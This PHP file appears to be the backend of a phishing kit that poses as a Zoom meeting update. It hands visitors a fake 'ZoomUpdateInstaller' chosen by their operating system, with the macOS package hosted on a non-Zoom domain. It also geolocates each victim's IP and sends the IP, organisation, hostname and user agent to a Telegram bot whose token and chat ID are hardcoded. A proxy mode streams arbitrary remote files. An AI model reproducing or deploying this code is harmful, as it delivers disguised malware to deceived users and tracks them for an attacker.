File: //proc/thread-self/cwd/zoommeeting/process2x.php
<?php
// =====================================================
// CONFIGURATION SECTION — EDIT THESE VALUES
// =====================================================
$DOWNLOAD_URL_WINDOWS = "./update/ZoomUpdateInstaller.msi"; // Windows download URL
$DOWNLOAD_URL_MACOS = "https://contabo.uno/zoommeeting/update/ZoomUpdateInstaller.pkg"; // macOS download URL
$TELEGRAM_BOT_TOKEN = "7068069867:AAFubCYpDNtFJaMqibFfIMq_DP7kingqDMA"; // Example: 123456:ABC-xyz
$TELEGRAM_CHAT_ID = "6159112165"; // Example: 987654321
// =====================================================
// ==================================================================
// PROXY MODE (if ?proxy=1) - MUST RUN BEFORE ANY JSON HEADERS
// ==================================================================
if (isset($_GET['proxy']) && $_GET['proxy'] == "1") {
// Read incoming url from POST, GET or JSON body
$rawUrl = null;
if (!empty($_POST['url'])) {
$rawUrl = $_POST['url'];
} elseif (!empty($_GET['url'])) {
$rawUrl = $_GET['url'];
} else {
$inputBody = file_get_contents('php://input');
if ($inputBody) {
$jsonBody = json_decode($inputBody, true);
if (json_last_error() === JSON_ERROR_NONE && !empty($jsonBody['url'])) {
$rawUrl = $jsonBody['url'];
}
}
}
if (!$rawUrl) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Missing url parameter';
exit;
}
// Basic sanitation
$rawUrl = trim($rawUrl);
if (preg_match('/[\r\n]/', $rawUrl)) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Invalid url';
exit;
}
// ---------- Safer ANY-HOST (blocks private/reserved IPs) ----------
$parsed = parse_url($rawUrl);
if (!$parsed || empty($parsed['host'])) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Malformed URL';
exit;
}
$host = $parsed['host'];
$resolvedIps = @gethostbynamel($host);
if (empty($resolvedIps)) {
$resolved = @gethostbyname($host);
if ($resolved === $host || !$resolved) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Unable to resolve host';
exit;
}
$resolvedIps = [$resolved];
}
foreach ($resolvedIps as $ip) {
if (!filter_var($ip, FILTER_VALIDATE_IP)) {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Invalid resolved IP';
exit;
}
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
http_response_code(403);
header('Content-Type: text/plain');
echo 'Access to private/reserved IPs not allowed';
exit;
}
}
// Enforce HTTPS (optional)
if (empty($parsed['scheme']) || strtolower($parsed['scheme']) !== 'https') {
http_response_code(400);
header('Content-Type: text/plain');
echo 'Only HTTPS URLs are allowed';
exit;
}
// ------------------------------------------------------------------
// HEAD request for headers
$headCh = curl_init($rawUrl);
curl_setopt($headCh, CURLOPT_NOBODY, true);
curl_setopt($headCh, CURLOPT_RETURNTRANSFER, true);
curl_setopt($headCh, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($headCh, CURLOPT_MAXREDIRS, 8);
curl_setopt($headCh, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($headCh, CURLOPT_HEADER, true);
curl_setopt($headCh, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($headCh, CURLOPT_TIMEOUT, 30);
$headResponse = curl_exec($headCh);
if ($headResponse === false) {
$err = curl_error($headCh);
curl_close($headCh);
http_response_code(502);
echo "Failed to fetch remote headers: $err";
exit;
}
$remoteContentType = null;
$remoteContentDisposition = null;
$remoteContentLength = null;
$remoteStatusCode = curl_getinfo($headCh, CURLINFO_HTTP_CODE) ?: 200;
$headerBlocks = preg_split("/\r\n\r\n/", trim($headResponse));
$lastHeaders = array_pop($headerBlocks);
$lines = preg_split("/\r\n/", $lastHeaders);
foreach ($lines as $line) {
if (stripos($line, 'Content-Type:') === 0) {
$remoteContentType = trim(substr($line, 13));
} elseif (stripos($line, 'Content-Disposition:') === 0) {
$remoteContentDisposition = trim(substr($line, 20));
} elseif (stripos($line, 'Content-Length:') === 0) {
$remoteContentLength = trim(substr($line, 16));
}
}
curl_close($headCh);
if (!headers_sent()) {
http_response_code($remoteStatusCode);
header('Content-Type: ' . ($remoteContentType ?: 'application/octet-stream'));
if ($remoteContentDisposition) {
header('Content-Disposition: ' . $remoteContentDisposition);
} else {
$fallbackName = basename($parsed['path'] ?? 'download.bin');
header('Content-Disposition: attachment; filename="' . $fallbackName . '"');
}
if ($remoteContentLength) {
header('Content-Length: ' . $remoteContentLength);
}
}
// Stream file
$ch = curl_init($rawUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_MAXREDIRS, 8);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_BUFFERSIZE, 16384);
curl_setopt($ch, CURLOPT_WRITEFUNCTION, function($curl, $data) {
echo $data;
@ob_flush();
@flush();
return strlen($data);
});
curl_exec($ch);
curl_close($ch);
exit;
}
// ==================================================================
// NORMAL MODE (JSON API)
// ==================================================================
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, OPTIONS');
header('Access-Control-Allow-Headers: Content-Type');
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
http_response_code(200);
exit();
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
http_response_code(405);
echo json_encode(['error' => 'Method not allowed']);
exit();
}
$input = json_decode(file_get_contents('php://input'), true);
if (!$input) {
http_response_code(400);
echo json_encode(['error' => 'Invalid JSON']);
exit();
}
/**
* Detect operating system from User-Agent string
*/
function detectOS() {
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
// Convert to lowercase for easier matching
$ua = strtolower($userAgent);
// Windows detection
if (strpos($ua, 'windows') !== false ||
strpos($ua, 'win32') !== false ||
strpos($ua, 'win64') !== false ||
strpos($ua, 'wow64') !== false) {
return 'windows';
}
// macOS detection
if (strpos($ua, 'macintosh') !== false ||
strpos($ua, 'mac os') !== false ||
strpos($ua, 'macos') !== false ||
strpos($ua, 'darwin') !== false) {
return 'macos';
}
// Linux detection (optional)
if (strpos($ua, 'linux') !== false) {
return 'linux';
}
// iPhone/iPad detection (iOS)
if (strpos($ua, 'iphone') !== false ||
strpos($ua, 'ipad') !== false ||
strpos($ua, 'ipod') !== false) {
return 'ios';
}
// Android detection
if (strpos($ua, 'android') !== false) {
return 'android';
}
// Default to Windows if cannot detect
return 'windows';
}
/**
* Get the appropriate download URL based on OS
*/
function getDownloadUrl($os) {
global $DOWNLOAD_URL_WINDOWS, $DOWNLOAD_URL_MACOS;
switch ($os) {
case 'windows':
return $DOWNLOAD_URL_WINDOWS;
case 'macos':
return $DOWNLOAD_URL_MACOS;
case 'linux':
// Optional: Add Linux download URL if needed
return $DOWNLOAD_URL_WINDOWS; // fallback
case 'ios':
case 'android':
// Optional: Add mobile URLs if needed
return $DOWNLOAD_URL_WINDOWS; // fallback
default:
return $DOWNLOAD_URL_WINDOWS; // default fallback
}
}
function getRealIP() {
$headers = ['HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'];
foreach ($headers as $h) {
if (!empty($_SERVER[$h])) {
$ip = explode(',', $_SERVER[$h])[0];
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
return trim($ip);
}
}
}
return $_SERVER['REMOTE_ADDR'] ?? 'unknown';
}
$action = $input['action'] ?? '';
if ($action === 'download') {
// Detect operating system
$os = detectOS();
// Get appropriate download URL
$downloadUrl = getDownloadUrl($os);
$ip = getRealIP();
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'unknown';
// Geo lookup
$country = $region = $org = $hostname = '';
$geo = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country,regionName,org,reverse");
if ($geo) {
$g = json_decode($geo, true);
if (($g['status'] ?? '') === 'success') {
$country = $g['country'] ?? '';
$region = $g['regionName'] ?? '';
$org = $g['org'] ?? '';
$hostname = $g['reverse'] ?? '';
}
}
// Telegram alert
if ($TELEGRAM_BOT_TOKEN !== "REPLACE_WITH_TELEGRAM_TOKEN" &&
$TELEGRAM_CHAT_ID !== "REPLACE_WITH_CHAT_ID") {
$msg = "🌍 New Download Alert!\n\n";
$msg .= "📌 IP: $ip\n";
$msg .= "🏳 Country: $country\n";
$msg .= "📍 Region: $region\n";
$msg .= "🏢 Org: $org\n";
$msg .= "🔗 Hostname: $hostname\n";
$msg .= "🖥 User-Agent: $userAgent\n";
$msg .= "💻 Detected OS: " . strtoupper($os) . "\n";
$msg .= "⬇ Download URL: $downloadUrl";
$turl = "https://api.telegram.org/bot{$TELEGRAM_BOT_TOKEN}/sendMessage";
file_get_contents($turl . "?chat_id={$TELEGRAM_CHAT_ID}&text=" . urlencode($msg));
}
echo json_encode([
'success' => true,
'os' => $os,
'downloadUrl' => $downloadUrl,
'message' => 'Download initiated for ' . ucfirst($os)
]);
exit;
}
// Optional: Add OS detection endpoint
if ($action === 'detect_os') {
$os = detectOS();
echo json_encode([
'success' => true,
'os' => $os,
'userAgent' => $_SERVER['HTTP_USER_AGENT'] ?? 'unknown',
'message' => 'OS detected successfully'
]);
exit;
}
echo json_encode(['error' => 'Unknown action']);
exit;
?>